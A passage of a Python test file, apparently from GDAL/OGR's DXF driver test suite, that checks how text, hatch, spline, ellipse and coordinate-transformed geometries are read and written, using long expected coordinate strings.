if ogrtest.check_feature_geometry( feat, 'LINESTRING (5 2 3,4.990256201039297 1.720974105023499 3,4.961072274966281 1.443307596159738 3,4.912590402935223 1.168353236728963 3,4.845046783753276 0.897450576732003 3,4.758770483143634 0.631919426697325 3,4.654181830570403 0.373053427696799 3,4.531790371435708 0.122113748856437 3,4.392192384625703 -0.11967705693282 3,4.23606797749979 -0.351141009169893 3,4.064177772475912 -0.571150438746157 3,3.877359201354605 -0.778633481835989 3,3.676522425435433 -0.972579301909577 3,3.462645901302633 -1.152043014426888 3,3.236771613882987 -1.316150290220167 3,3.0 -1.464101615137754 3,2.75348458715631 -1.595176185196668 3,2.498426373663648 -1.70873541826715 3,2.23606797749979 -1.804226065180614 3,1.967687582398672 -1.881182905103986 3,1.694592710667722 -1.939231012048832 3,1.418113853070614 -1.978087581473093 3,1.139597986810004 -1.997563308076383 3,0.860402013189997 -1.997563308076383 3,0.581886146929387 -1.978087581473094 3,0.305407289332279 -1.939231012048832 3,0.032312417601329 -1.881182905103986 3,-0.236067977499789 -1.804226065180615 3,-0.498426373663648 -1.70873541826715 3,-0.75348458715631 -1.595176185196668 3,-1.0 -1.464101615137755 3,-1.236771613882987 -1.316150290220167 3,-1.462645901302633 -1.152043014426888 3,-1.676522425435433 -0.972579301909577 3,-1.877359201354605 -0.778633481835989 3,-2.064177772475912 -0.571150438746158 3,-2.236067977499789 -0.351141009169893 3,-2.392192384625704 -0.11967705693282 3,-2.531790371435707 0.122113748856436 3,-2.654181830570403 0.373053427696798 3,-2.758770483143633 0.631919426697324 3,-2.845046783753275 0.897450576732001 3,-2.912590402935223 1.168353236728963 3,-2.961072274966281 1.443307596159737 3,-2.990256201039297 1.720974105023498 3,-3.0 2.0 3,-2.990256201039297 2.279025894976499 3,-2.961072274966281 2.556692403840262 3,-2.912590402935223 2.831646763271036 3,-2.845046783753276 3.102549423267996 3,-2.758770483143634 3.368080573302675 3,-2.654181830570404 3.626946572303199 3,-2.531790371435708 3.877886251143563 3,-2.392192384625704 4.119677056932819 3,-2.23606797749979 4.351141009169892 3,-2.064177772475912 4.571150438746157 3,-1.877359201354604 4.778633481835989 3,-1.676522425435434 4.972579301909576 3,-1.462645901302632 5.152043014426889 3,-1.236771613882989 5.316150290220166 3,-1.0 5.464101615137753 3,-0.753484587156311 5.595176185196667 3,-0.498426373663649 5.70873541826715 3,-0.23606797749979 5.804226065180615 3,0.032312417601329 5.881182905103985 3,0.305407289332279 5.939231012048833 3,0.581886146929387 5.978087581473094 3,0.860402013189993 5.997563308076383 3,1.139597986810005 5.997563308076383 3,1.418113853070612 5.978087581473094 3,1.69459271066772 5.939231012048833 3,1.96768758239867 5.881182905103986 3,2.236067977499789 5.804226065180615 3,2.498426373663648 5.70873541826715 3,2.75348458715631 5.595176185196668 3,3.0 5.464101615137754 3,3.236771613882985 5.316150290220168 3,3.462645901302634 5.152043014426887 3,3.676522425435431 4.972579301909578 3,3.877359201354603 4.778633481835991 3,4.064177772475912 4.571150438746159 3,4.23606797749979 4.351141009169893 3,4.392192384625702 4.119677056932823 3,4.531790371435708 3.877886251143563 3,4.654181830570404 3.626946572303201 3,4.758770483143634 3.368080573302675 3,4.845046783753275 3.102549423267999 3,4.912590402935223 2.831646763271039 3,4.961072274966281 2.556692403840263 3,4.990256201039298 2.279025894976499 3,5.0 2.0 3)' ):
return 'fail'
ds = None
return 'success'
###############################################################################
# TEXT
def ogr_dxf_22():
# Read MTEXT feature
ds = ogr.Open('data/text.dxf')
lyr = ds.GetLayer(0)
if version_info >= (3,0,0):
test_text = 'test\ttext ab/c~d\u00B1ef^g.h#i jklm'
else:
exec("test_text = u'test\ttext ab/c~d\u00B1ef^g.h#i jklm'")
test_text = test_text.encode('utf-8')
feat = lyr.GetNextFeature()
if feat.GetFieldAsString('Text') != test_text:
gdaltest.post_reason('bad attribute')
feat.DumpReadable()
return 'fail'
style = feat.GetStyleString()
if style != 'LABEL(f:"SwissCheese",bo:1,t:"' + test_text + '",a:45,s:10g,w:51,c:#ff0000)':
gdaltest.post_reason('bad style')
feat.DumpReadable()
print(style)
return 'fail'
if ogrtest.check_feature_geometry( feat, 'POINT(1 2 3)' ):
gdaltest.post_reason('bad geometry')
feat.DumpReadable()
return 'fail'
# Write text feature
out_ds = ogr.GetDriverByName('DXF').CreateDataSource('/vsimem/ogr_dxf_22.dxf')
out_lyr = out_ds.CreateLayer( 'entities' )
out_feat = ogr.Feature(out_lyr.GetLayerDefn())
out_feat.SetStyleString(style)
out_feat.SetGeometry(feat.GetGeometryRef())
out_lyr.CreateFeature(out_feat)
out_feat = None
out_lyr = None
out_ds = None
ds = None
# Check written file
ds = ogr.Open('/vsimem/ogr_dxf_22.dxf')
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
if feat.GetFieldAsString('Text') != test_text:
gdaltest.post_reason('bad attribute')
feat.DumpReadable()
return 'fail'
style = feat.GetStyleString()
if style != 'LABEL(f:"SwissCheese",bo:1,t:"' + test_text + '",a:45,s:10g,w:51,c:#ff0000)':
gdaltest.post_reason('bad style')
feat.DumpReadable()
print(style)
return 'fail'
if ogrtest.check_feature_geometry( feat, 'POINT(1 2 3)' ):
gdaltest.post_reason('bad geometry')
feat.DumpReadable()
return 'fail'
ds = None
gdal.Unlink('/vsimem/ogr_dxf_22.dxf')
# Now try reading in the MTEXT feature without translating escape sequences
gdal.SetConfigOption('DXF_TRANSLATE_ESCAPE_SEQUENCES', 'FALSE')
ds = ogr.Open('data/text.dxf')
gdal.SetConfigOption('DXF_TRANSLATE_ESCAPE_SEQUENCES', None)
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
if feat.GetFieldAsString('Text') != '\A1;test^Itext\~\pt0.2;{\H0.7x;\Sab\/c\~d%%p^ ef\^ g.h\#i;} j{\L\Ok\ol}m':
gdaltest.post_reason('bad attribute with DXF_TRANSLATE_ESCAPE_SEQUENCES = FALSE')
feat.DumpReadable()
return 'fail'
ds = None
return 'success'
###############################################################################
# POLYGON with hole
def ogr_dxf_23():
# Write polygon
out_ds = ogr.GetDriverByName('DXF').CreateDataSource('/vsimem/ogr_dxf_23.dxf')
out_lyr = out_ds.CreateLayer( 'entities' )
out_feat = ogr.Feature(out_lyr.GetLayerDefn())
out_feat.SetStyleString('BRUSH(fc:#ff0000)')
wkt = 'POLYGON ((0 0,0 10,10 10,10 0,0 0),(1 1,1 9,9 9,9 1,1 1))'
out_feat.SetGeometry(ogr.CreateGeometryFromWkt(wkt))
out_lyr.CreateFeature(out_feat)
out_feat = None
out_lyr = None
out_ds = None
ds = None
# Check written file
ds = ogr.Open('/vsimem/ogr_dxf_23.dxf')
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
style = feat.GetStyleString()
if style != 'BRUSH(fc:#ff0000)':
gdaltest.post_reason('bad style')
print(style)
return 'fail'
if ogrtest.check_feature_geometry( feat, wkt ):
gdaltest.post_reason('bad geometry')
return 'fail'
ds = None
gdal.Unlink('/vsimem/ogr_dxf_23.dxf')
return 'success'
###############################################################################
# HATCH
def ogr_dxf_24():
ds = ogr.Open('data/hatch.dxf')
lyr = ds.GetLayer(0)
gdal.SetConfigOption('OGR_ARC_STEPSIZE', '45')
feat = lyr.GetNextFeature()
gdal.SetConfigOption('OGR_ARC_STEPSIZE', None)
if ogrtest.check_feature_geometry( feat, 'POLYGON ((2 1,1.646446609406726 0.853553390593274,1.5 0.5,1.646446609406726 0.146446609406726,2 0,2.0 0.0,2.146446609406726 -0.353553390593274,2.5 -0.5,2.853553390593274 -0.353553390593274,3.0 -0.0,3 0,3.353553390593274 0.146446609406726,3.5 0.5,3.353553390593274 0.853553390593273,3 1,2.853553390593274 1.353553390593274,2.5 1.5,2.146446609406726 1.353553390593274,2 1))' ):
return 'fail'
gdal.SetConfigOption('OGR_ARC_STEPSIZE', '45')
feat = lyr.GetNextFeature()
gdal.SetConfigOption('OGR_ARC_STEPSIZE', None)
if ogrtest.check_feature_geometry( feat, 'POLYGON ((0.0 0.0 0,-0.353553390593274 0.146446609406726 0,-0.5 0.5 0,-0.353553390593274 0.853553390593274 0,-0.0 1.0 0,0.0 1.0 0,0.146446609406726 1.353553390593274 0,0.5 1.5 0,0.853553390593274 1.353553390593274 0,1.0 1.0 0,1.0 1.0 0,1.353553390593274 0.853553390593274 0,1.5 0.5 0,1.353553390593274 0.146446609406727 0,1.0 0.0 0,1 0 0,0.853553390593274 -0.353553390593274 0,0.5 -0.5 0,0.146446609406726 -0.353553390593274 0,0.0 -0.0 0,0.0 0.0 0))' ):
return 'fail'
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((-1 -1,-1 0,0 0,-1 -1))' ):
return 'fail'
ds = None
return 'success'
###############################################################################
# 3DFACE
def ogr_dxf_25():
ds = ogr.Open('data/3dface.dxf')
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((10 20 30,11 21 31,12 22 32,10 20 30))' ):
feat.DumpReadable()
return 'fail'
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((10 20 30,11 21 31,12 22 32,13 23 33,10 20 30))' ):
feat.DumpReadable()
return 'fail'
ds = None
return 'success'
###############################################################################
# SOLID (#5380)
def ogr_dxf_26():
ds = ogr.Open('data/solid.dxf')
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((2.716846 2.762514,2.393674 1.647962,4.391042 1.06881,4.714214 2.183362,2.716846 2.762514))' ):
feat.DumpReadable()
return 'fail'
ds = None
return 'success'
###############################################################################
# Test reading a DXF file without .dxf extensions (#5994)
def ogr_dxf_27():
gdal.FileFromMemBuffer('/vsimem/a_dxf_without_extension', open('data/solid.dxf').read())
ds = ogr.Open('/vsimem/a_dxf_without_extension')
if ds is None:
return 'fail'
gdal.Unlink('/vsimem/a_dxf_without_extension')
return 'success'
###############################################################################
# Test reading a ELLIPSE with Z extrusion axis value of -1.0 (#5075)
def ogr_dxf_28():
ds = ogr.Open('data/ellipse_z_extrusion_minus_1.dxf')
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (247.379588068074 525.677518653024 0,247.560245171261 525.685592896308 0,247.739941456101 525.705876573267 0,247.917852718752 525.738276649788 0,248.09316294264 525.782644518081 0,248.265068041245 525.838776678293 0,248.432779546163 525.90641567189 0,248.595528223532 525.985251262527 0,248.752567602242 526.074921858996 0,248.903177397731 526.175016173715 0,249.046666815684 526.285075109164 0,249.182377720457 526.404593863601 0,249.309687653722 526.533024246411 0,249.428012689458 526.669777192466 0,249.536810112221 526.814225463957 0,249.635580906384 526.965706527318 0,249.723872044951 527.123525592032 0)' ):
feat.DumpReadable()
return 'fail'
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (290.988651614349 531.01336644407 0,290.900681473157 531.171364661134 0,290.823607338001 531.334954880971 0,290.757782720911 531.503386772611 0,290.703509536322 531.675887798031 0,290.661036716299 531.85166675552 0,290.630559068775 532.029917408641 0,290.612216384031 532.209822184155 0,290.606092793529 532.390555921946 0,290.612216384031 532.571289659737 0,290.630559068775 532.751194435252 0,290.661036716299 532.929445088373 0,290.703509536321 533.105224045862 0,290.75778272091 533.277725071282 0,290.823607338 533.446156962922 0,290.900681473156 533.60974718276 0,290.988651614348 533.767745399824 0)' ):
feat.DumpReadable()
return 'fail'
ds = None
return 'success'
###############################################################################
# SPLINE with weights
def ogr_dxf_29():
ds = ogr.Open('data/spline_weight.dxf')
lyr = ds.GetLayer(0)
# spline 227, no weight
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (2 2, 2.10256409645081 2.15371131896973, 2.20512819290161 2.3066132068634, 2.307692527771 2.4578971862793, 2.41025638580322 2.6067533493042, 2.51282024383545 2.75237274169922, 2.61538457870483 2.89394640922546, 2.71794891357422 3.03066444396973, 2.82051301002502 3.16171884536743, 2.92307710647583 3.28629970550537, 3.02564096450806 3.40359783172607, 3.12820529937744 3.51280379295349, 3.23076939582825 3.61310863494873, 3.33333325386047 3.70370388031006, 3.43589782714844 3.78377938270569, 3.53846144676208 3.85252642631531, 3.64102602005005 3.90913581848145, 3.74358987808228 3.95279765129089, 3.84615445137024 3.98270392417908, 3.94871830940247 3.99804472923279, 4.05128240585327 3.99804425239563, 4.15384674072266 3.9827036857605, 4.25641107559204 3.95279765129089, 4.35897541046143 3.90913534164429, 4.46153926849365 3.85252571105957, 4.56410360336304 3.78377866744995, 4.66666793823242 3.70370292663574, 4.76923179626465 3.61310815811157, 4.87179613113403 3.51280236244202, 4.97436046600342 3.40359592437744, 5.07692432403564 3.2862982749939, 5.17948865890503 3.16171741485596, 5.28205299377441 3.03066277503967, 5.38461685180664 2.89394426345825, 5.48718070983887 2.75237035751343, 5.58974552154541 2.60675096511841, 5.69230937957764 2.45789456367493, 5.79487323760986 2.30661058425903, 5.89743757247925 2.15370845794678, 6 2)' ):
feat.DumpReadable()
return 'fail'
# spline 261, weight(3) = 2.0
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (2 2, 2.10976576805115 2.16451454162598, 2.23113083839417 2.34563326835632, 2.35994720458984 2.53639197349548, 2.49239826202393 2.73041176795959, 2.62522411346436 2.92225241661072, 2.75582838058472 3.10756635665894, 2.88229131698608 3.2831084728241, 3.00331926345825 3.44663000106812, 3.11815142631531 3.59672045707703, 3.2264621257782 3.73262500762939, 3.32825922966003 3.85407567024231, 3.42379808425903 3.96113181114197, 3.51351404190063 4.05405473709106, 3.59796214103699 4.13319540023804, 3.67778849601746 4.19891929626465, 3.75369834899902 4.25152969360352, 3.82645153999329 4.29121112823486, 3.89685702323914 4.31797361373901, 3.96579027175903 4.33159732818604, 4.03421020507812 4.33159732818604, 4.1031436920166 4.31797361373901, 4.17354917526245 4.29121017456055, 4.24630165100098 4.2515287399292, 4.32221221923828 4.19891929626465, 4.40203857421875 4.13319492340088, 4.48648738861084 4.05405378341675, 4.57620286941528 3.96113133430481, 4.67174291610718 3.85407471656799, 4.77353954315186 3.73262333869934, 4.88184928894043 3.59671831130981, 4.99668216705322 3.44662809371948, 5.11771011352539 3.28310608863831, 5.24417400360107 3.10756373405457, 5.37477827072144 2.92224931716919, 5.50760412216187 2.73040890693665, 5.64005517959595 2.5363883972168, 5.76887130737305 2.34562969207764, 5.89023685455322 2.16451120376587, 6 2)' ):
feat.DumpReadable()
return 'fail'
# spline 262, weight(3) = 0.5
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (2 2, 2.09894275665283 2.14827871322632, 2.19183802604675 2.28667020797729, 2.28029608726501 2.41674375534058, 2.36573505401611 2.53972935676575, 2.4494321346283 2.65657186508179, 2.53256177902222 2.76796913146973, 2.61621570587158 2.87439489364624, 2.70142364501953 2.97611308097839, 2.78915071487427 3.07318329811096, 2.88029623031616 3.16546249389648, 2.97567653656006 3.25260472297668, 3.07599782943726 3.33406257629395, 3.18181824684143 3.40909075737, 3.29349946975708 3.4767644405365, 3.4111499786377 3.53600478172302, 3.53456783294678 3.58562660217285, 3.66318273544312 3.62440752983093, 3.79601716995239 3.6511766910553, 3.93166828155518 3.66492199897766, 4.06833267211914 3.66492199897766, 4.20398426055908 3.65117692947388, 4.33681774139404 3.62440729141235, 4.4654335975647 3.58562660217285, 4.58885097503662 3.53600406646729, 4.70650196075439 3.47676372528076, 4.81818294525146 3.40909028053284, 4.92400360107422 3.33406162261963, 5.02432489395142 3.25260376930237, 5.11970520019531 3.16546106338501, 5.21085071563721 3.07318210601807, 5.29857730865479 2.9761118888855, 5.38378524780273 2.87439346313477, 5.46744012832642 2.76796770095825, 5.55056858062744 2.65656995773315, 5.63426637649536 2.53972721099854, 5.71970558166504 2.41674160957336, 5.8081636428833 2.2866678237915, 5.9010591506958 2.14827609062195, 6 2)' ):
feat.DumpReadable()
return 'fail'
ds = None
return 'success'
###############################################################################
# SPLINE closed
def ogr_dxf_30():
ds = ogr.Open('data/spline_closed.dxf')
lyr = ds.GetLayer(0)
# spline 24b, closed
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (14 2, 13.9043273925781 2.11115527153015, 13.82310962677 2.23728489875793, 13.7564849853516 2.3759388923645, 13.7045974731445 2.52466750144958, 13.6675891876221 2.68102264404297, 13.6455984115601 2.84255337715149, 13.6387672424316 3.00681042671204, 13.6472396850586 3.17134499549866, 13.6711559295654 3.33370733261108, 13.7106552124023 3.49144792556763, 13.7658815383911 3.64211750030518, 13.8369770050049 3.78326630592346, 13.9240808486938 3.9124448299408, 14.0273275375366 4.0272102355957, 14.1460762023926 4.125901222229, 14.2781581878662 4.20836925506592, 14.4212408065796 4.27464532852173, 14.5729866027832 4.32475566864014, 14.7310619354248 4.35873079299927, 14.8931264877319 4.37659645080566, 15.056845664978 4.37838315963745, 15.2198839187622 4.36411762237549, 15.3799018859863 4.33382892608643, 15.5345678329468 4.2875452041626, 15.681544303894 4.22529458999634, 15.8184909820557 4.14710569381714, 15.9430751800537 4.05300617218018, 16.0530071258545 3.94307255744934, 16.1471080780029 3.81848883628845, 16.2252960205078 3.68154096603394, 16.2875461578369 3.53456616401672, 16.3338298797607 3.37990093231201, 16.3641166687012 3.219881772995, 16.3783836364746 3.05684399604797, 16.3765964508057 2.89312481880188, 16.3587284088135 2.73106050491333, 16.3247547149658 2.57298684120178, 16.2746448516846 2.42124080657959, 16.2083702087402 2.27815842628479, 16.1259021759033 2.146075963974, 16.0272102355957 2.02732920646667, 15.9124450683594 1.92408156394958, 15.7832660675049 1.83697760105133, 15.6421175003052 1.7658828496933, 15.4914503097534 1.71065592765808, 15.3337097167969 1.67115533351898, 15.1713457107544 1.6472395658493, 15.0068111419678 1.63876724243164, 14.8425559997559 1.64559710025787, 14.681022644043 1.66758728027344, 14.5246696472168 1.70459699630737, 14.375940322876 1.75648427009583, 14.2372856140137 1.82310783863068, 14.1111574172974 1.90432631969452, 14 2)' ):
feat.DumpReadable()
return 'fail'
# spline 24c, closed, recalculate knots
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (14 2, 13.9043273925781 2.11115527153015, 13.82310962677 2.23728489875793, 13.7564849853516 2.3759388923645, 13.7045974731445 2.52466750144958, 13.6675891876221 2.68102264404297, 13.6455984115601 2.84255337715149, 13.6387672424316 3.00681042671204, 13.6472396850586 3.17134499549866, 13.6711559295654 3.33370733261108, 13.7106552124023 3.49144792556763, 13.7658815383911 3.64211750030518, 13.8369770050049 3.78326630592346, 13.9240808486938 3.9124448299408, 14.0273275375366 4.0272102355957, 14.1460762023926 4.125901222229, 14.2781581878662 4.20836925506592, 14.4212408065796 4.27464532852173, 14.5729866027832 4.32475566864014, 14.7310619354248 4.35873079299927, 14.8931264877319 4.37659645080566, 15.056845664978 4.37838315963745, 15.2198839187622 4.36411762237549, 15.3799018859863 4.33382892608643, 15.5345678329468 4.2875452041626, 15.681544303894 4.22529458999634, 15.8184909820557 4.14710569381714, 15.9430751800537 4.05300617218018, 16.0530071258545 3.94307255744934, 16.1471080780029 3.81848883628845, 16.2252960205078 3.68154096603394, 16.2875461578369 3.53456616401672, 16.3338298797607 3.37990093231201, 16.3641166687012 3.219881772995, 16.3783836364746 3.05684399604797, 16.3765964508057 2.89312481880188, 16.3587284088135 2.73106050491333, 16.3247547149658 2.57298684120178, 16.2746448516846 2.42124080657959, 16.2083702087402 2.27815842628479, 16.1259021759033 2.146075963974, 16.0272102355957 2.02732920646667, 15.9124450683594 1.92408156394958, 15.7832660675049 1.83697760105133, 15.6421175003052 1.7658828496933, 15.4914503097534 1.71065592765808, 15.3337097167969 1.67115533351898, 15.1713457107544 1.6472395658493, 15.0068111419678 1.63876724243164, 14.8425559997559 1.64559710025787, 14.681022644043 1.66758728027344, 14.5246696472168 1.70459699630737, 14.375940322876 1.75648427009583, 14.2372856140137 1.82310783863068, 14.1111574172974 1.90432631969452, 14 2)' ):
feat.DumpReadable()
return 'fail'
ds = None
return 'success'
###############################################################################
# OCS2WCS transformations 1
def ogr_dxf_31():
ds = ogr.Open('data/ocs2wcs1.dxf')
lyr = ds.GetLayer(0)
# INFO: Open of `ocs2wcs1.dxf' using driver `DXF' successful.
# OGRFeature(entities):0
# EntityHandle (String) = 1EF
# POINT Z (4 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (4 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):1
# EntityHandle (String) = 1F0
# LINESTRING Z (0 0 0,1 1 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,1 1 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):2
# EntityHandle (String) = 1F1
# LINESTRING (1 1,2 1,1 2,1 1)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (1 1,2 1,1 2,1 1)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):3
# EntityHandle (String) = 1F2
# LINESTRING Z (1 1 0,1 2 0,2 2 0,1 1 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1 1 0,1 2 0,2 2 0,1 1 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):4
# EntityHandle (String) = 1F7
# LINESTRING Z (6 4 0,5.99512810051965 3.86048705251175 0,5.98053613748314 3.72165379807987 0,5.95629520146761 3.58417661836448 0,5.92252339187664 3.448725288366 0,5.87938524157182 3.31595971334866 0,5.8270909152852 3.1865267138484 0,5.76589518571785 3.06105687442822 0,5.69609619231285 2.94016147153359 0,5.61803398874989 2.82442949541505 0,5.53208888623796 2.71442478062692 0,5.4386796006773 2.61068325908201 0,5.33826121271772 2.51371034904521 0,5.23132295065132 2.42397849278656 0,5.11838580694149 2.34192485488992 0,5.0 2.26794919243112 0,4.87674229357815 2.20241190740167 0,4.74921318683182 2.14563229086643 0,4.61803398874989 2.09788696740969 0,4.48384379119934 2.05940854744801 0,4.34729635533386 2.03038449397558 0,4.20905692653531 2.01095620926345 0,4.069798993405 2.00121834596181 0,3.930201006595 2.00121834596181 0,3.79094307346469 2.01095620926345 0,3.65270364466614 2.03038449397558 0,3.51615620880066 2.05940854744801 0,3.38196601125011 2.09788696740969 0,3.25078681316818 2.14563229086643 0,3.12325770642185 2.20241190740167 0,3.0 2.26794919243112 0,2.88161419305851 2.34192485488992 0,2.76867704934868 2.42397849278656 0,2.66173878728228 2.51371034904521 0,2.5613203993227 2.61068325908201 0,2.46791111376204 2.71442478062692 0,2.38196601125011 2.82442949541505 0,2.30390380768715 2.94016147153359 0,2.23410481428215 3.06105687442822 0,2.1729090847148 3.1865267138484 0,2.12061475842818 3.31595971334866 0,2.07747660812336 3.448725288366 0,2.04370479853239 3.58417661836448 0,2.01946386251686 3.72165379807987 0,2.00487189948035 3.86048705251175 0,2.0 4.0 0,2.00487189948035 4.13951294748825 0,2.01946386251686 4.27834620192013 0,2.04370479853239 4.41582338163552 0,2.07747660812336 4.551274711634 0,2.12061475842818 4.68404028665134 0,2.1729090847148 4.8134732861516 0,2.23410481428215 4.93894312557178 0,2.30390380768715 5.05983852846641 0,2.38196601125011 5.17557050458495 0,2.46791111376204 5.28557521937308 0,2.5613203993227 5.38931674091799 0,2.66173878728228 5.48628965095479 0,2.76867704934868 5.57602150721344 0,2.88161419305851 5.65807514511008 0,3.0 5.73205080756888 0,3.12325770642184 5.79758809259833 0,3.25078681316818 5.85436770913357 0,3.38196601125011 5.90211303259031 0,3.51615620880066 5.94059145255199 0,3.65270364466614 5.96961550602442 0,3.79094307346469 5.98904379073655 0,3.930201006595 5.99878165403819 0,4.069798993405 5.99878165403819 0,4.20905692653531 5.98904379073655 0,4.34729635533386 5.96961550602442 0,4.48384379119933 5.94059145255199 0,4.61803398874989 5.90211303259031 0,4.74921318683182 5.85436770913357 0,4.87674229357815 5.79758809259833 0,5.0 5.73205080756888 0,5.11838580694149 5.65807514511008 0,5.23132295065132 5.57602150721344 0,5.33826121271772 5.48628965095479 0,5.4386796006773 5.389316740918 0,5.53208888623796 5.28557521937308 0,5.61803398874989 5.17557050458495 0,5.69609619231285 5.05983852846641 0,5.76589518571785 4.93894312557178 0,5.8270909152852 4.8134732861516 0,5.87938524157182 4.68404028665134 0,5.92252339187664 4.551274711634 0,5.95629520146761 4.41582338163552 0,5.98053613748314 4.27834620192013 0,5.99512810051965 4.13951294748825 0,6.0 4.0 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (6 4 0,5.99512810051965 3.86048705251175 0,5.98053613748314 3.72165379807987 0,5.95629520146761 3.58417661836448 0,5.92252339187664 3.448725288366 0,5.87938524157182 3.31595971334866 0,5.8270909152852 3.1865267138484 0,5.76589518571785 3.06105687442822 0,5.69609619231285 2.94016147153359 0,5.61803398874989 2.82442949541505 0,5.53208888623796 2.71442478062692 0,5.4386796006773 2.61068325908201 0,5.33826121271772 2.51371034904521 0,5.23132295065132 2.42397849278656 0,5.11838580694149 2.34192485488992 0,5.0 2.26794919243112 0,4.87674229357815 2.20241190740167 0,4.74921318683182 2.14563229086643 0,4.61803398874989 2.09788696740969 0,4.48384379119934 2.05940854744801 0,4.34729635533386 2.03038449397558 0,4.20905692653531 2.01095620926345 0,4.069798993405 2.00121834596181 0,3.930201006595 2.00121834596181 0,3.79094307346469 2.01095620926345 0,3.65270364466614 2.03038449397558 0,3.51615620880066 2.05940854744801 0,3.38196601125011 2.09788696740969 0,3.25078681316818 2.14563229086643 0,3.12325770642185 2.20241190740167 0,3.0 2.26794919243112 0,2.88161419305851 2.34192485488992 0,2.76867704934868 2.42397849278656 0,2.66173878728228 2.51371034904521 0,2.5613203993227 2.61068325908201 0,2.46791111376204 2.71442478062692 0,2.38196601125011 2.82442949541505 0,2.30390380768715 2.94016147153359 0,2.23410481428215 3.06105687442822 0,2.1729090847148 3.1865267138484 0,2.12061475842818 3.31595971334866 0,2.07747660812336 3.448725288366 0,2.04370479853239 3.58417661836448 0,2.01946386251686 3.72165379807987 0,2.00487189948035 3.86048705251175 0,2.0 4.0 0,2.00487189948035 4.13951294748825 0,2.01946386251686 4.27834620192013 0,2.04370479853239 4.41582338163552 0,2.07747660812336 4.551274711634 0,2.12061475842818 4.68404028665134 0,2.1729090847148 4.8134732861516 0,2.23410481428215 4.93894312557178 0,2.30390380768715 5.05983852846641 0,2.38196601125011 5.17557050458495 0,2.46791111376204 5.28557521937308 0,2.5613203993227 5.38931674091799 0,2.66173878728228 5.48628965095479 0,2.76867704934868 5.57602150721344 0,2.88161419305851 5.65807514511008 0,3.0 5.73205080756888 0,3.12325770642184 5.79758809259833 0,3.25078681316818 5.85436770913357 0,3.38196601125011 5.90211303259031 0,3.51615620880066 5.94059145255199 0,3.65270364466614 5.96961550602442 0,3.79094307346469 5.98904379073655 0,3.930201006595 5.99878165403819 0,4.069798993405 5.99878165403819 0,4.20905692653531 5.98904379073655 0,4.34729635533386 5.96961550602442 0,4.48384379119933 5.94059145255199 0,4.61803398874989 5.90211303259031 0,4.74921318683182 5.85436770913357 0,4.87674229357815 5.79758809259833 0,5.0 5.73205080756888 0,5.11838580694149 5.65807514511008 0,5.23132295065132 5.57602150721344 0,5.33826121271772 5.48628965095479 0,5.4386796006773 5.389316740918 0,5.53208888623796 5.28557521937308 0,5.61803398874989 5.17557050458495 0,5.69609619231285 5.05983852846641 0,5.76589518571785 4.93894312557178 0,5.8270909152852 4.8134732861516 0,5.87938524157182 4.68404028665134 0,5.92252339187664 4.551274711634 0,5.95629520146761 4.41582338163552 0,5.98053613748314 4.27834620192013 0,5.99512810051965 4.13951294748825 0,6.0 4.0 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):5
# EntityHandle (String) = 1F8
# LINESTRING Z (2 4 0,2.00487189948035 4.06975647374412 0,2.01946386251686 4.13917310096007 0,2.04370479853239 4.20791169081776 0,2.07747660812336 4.275637355817 0,2.12061475842818 4.34202014332567 0,2.1729090847148 4.4067366430758 0,2.23410481428215 4.46947156278589 0,2.30390380768715 4.52991926423321 0,2.38196601125011 4.58778525229247 0,2.46791111376204 4.64278760968654 0,2.5613203993227 4.694658370459 0,2.66173878728228 4.74314482547739 0,2.76867704934868 4.78801075360672 0,2.88161419305851 4.82903757255504 0,3.0 4.86602540378444 0,3.12325770642185 4.89879404629917 0,3.25078681316818 4.92718385456679 0,3.38196601125011 4.95105651629515 0,3.51615620880067 4.970295726276 0,3.65270364466614 4.98480775301221 0,3.79094307346469 4.99452189536827 0,3.930201006595 4.9993908270191 0,4.069798993405 4.9993908270191 0,4.20905692653531 4.99452189536827 0,4.34729635533386 4.98480775301221 0,4.48384379119934 4.970295726276 0,4.61803398874989 4.95105651629515 0,4.74921318683182 4.92718385456679 0,4.87674229357816 4.89879404629917 0,5.0 4.86602540378444 0,5.11838580694149 4.82903757255504 0,5.23132295065132 4.78801075360672 0,5.33826121271772 4.74314482547739 0,5.4386796006773 4.694658370459 0,5.53208888623796 4.64278760968654 0,5.61803398874989 4.58778525229247 0,5.69609619231285 4.5299192642332 0,5.76589518571785 4.46947156278589 0,5.8270909152852 4.4067366430758 0,5.87938524157182 4.34202014332567 0,5.92252339187664 4.275637355817 0,5.95629520146761 4.20791169081776 0,5.98053613748314 4.13917310096006 0,5.99512810051965 4.06975647374412 0,6.0 4.0 0,5.99512810051965 3.93024352625587 0,5.98053613748314 3.86082689903993 0,5.95629520146761 3.79208830918224 0,5.92252339187664 3.724362644183 